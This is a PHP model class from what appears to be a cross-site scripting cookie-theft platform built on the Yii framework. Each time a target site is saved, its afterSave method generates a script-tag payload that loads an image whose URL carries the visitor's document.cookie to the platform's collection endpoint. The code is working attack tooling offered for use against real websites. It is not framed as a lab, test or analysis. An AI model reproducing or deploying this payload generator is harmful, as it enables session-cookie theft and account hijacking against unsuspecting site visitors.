<?php

namespace backend\modules\xss\models;

use Yii;
use yii\helpers\Url;
use yii\helpers\VarDumper;

/**
 * This is the model class for table "{{%xss_sites}}".
 *
 * @property integer $id
 * @property string $url
 * @property string $code
 */
class XssSites extends \yii\db\ActiveRecord
{
    /**
     * @inheritdoc
     */
    public static function tableName()
    {
        return '{{%xss_sites}}';
    }

    /**
     * @inheritdoc
     */
    public function rules()
    {
        return [
            [['url'], 'required'],
            [['code'], 'string'],
            [['url'], 'string', 'max' => 255],
            [['url'], 'url'],
            [['url'], 'unique']
        ];
    }

    /**
     * @inheritdoc
     */
    public function attributeLabels()
    {
        return [
            'id' => 'ID',
            'url' => 'Url',
            'code' => 'Code',
        ];
    }

    public function afterSave($insert, $changedAttributes)
    {
        if(!$this->code) {
            /** @var \yii\web\UrlManager $urlManager */
            $urlManager =  Yii::$app->frontendUrlManager;
            $url =  $urlManager->createAbsoluteUrl(['/xss/cookie/create','siteId'=>$this->id,'cookie'=>'']);
            $this->code = "<script>d=document;m=d.createElement('img');m.src='$url/'+d.cookie;d[0]=m;</script>";
            $this->updateAttributes(['code']);
        }

        parent::afterSave($insert, $changedAttributes); // TODO: Change the autogenerated stub
    }


}
